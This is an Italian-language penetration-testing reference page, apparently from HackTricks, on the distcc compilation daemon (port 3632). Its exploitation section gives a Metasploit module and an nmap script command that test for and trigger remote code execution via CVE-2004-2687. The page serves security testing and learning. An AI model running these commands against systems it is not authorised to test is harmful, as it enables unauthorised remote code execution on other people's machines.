{{#include ../banners/hacktricks-training.md}} # Informazioni di base **Distcc** è uno strumento che migliora il **processo di compilazione** sfruttando la **potenza di elaborazione inattiva** di altri computer nella rete. Quando **distcc** è configurato su una macchina, questa macchina è in grado di distribuire i suoi **compiti di compilazione** a un altro sistema. Questo sistema destinatario deve eseguire il **demone distccd** e deve avere un **compilatore compatibile** installato per elaborare il codice inviato. **Porta predefinita:** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` # Sfruttamento Controlla se è vulnerabile a **CVE-2004-2687** per eseguire codice arbitrario: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` # Shodan _Non penso che shodan rilevi questo servizio._ # Resources - [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) - [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) Post creato da **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}}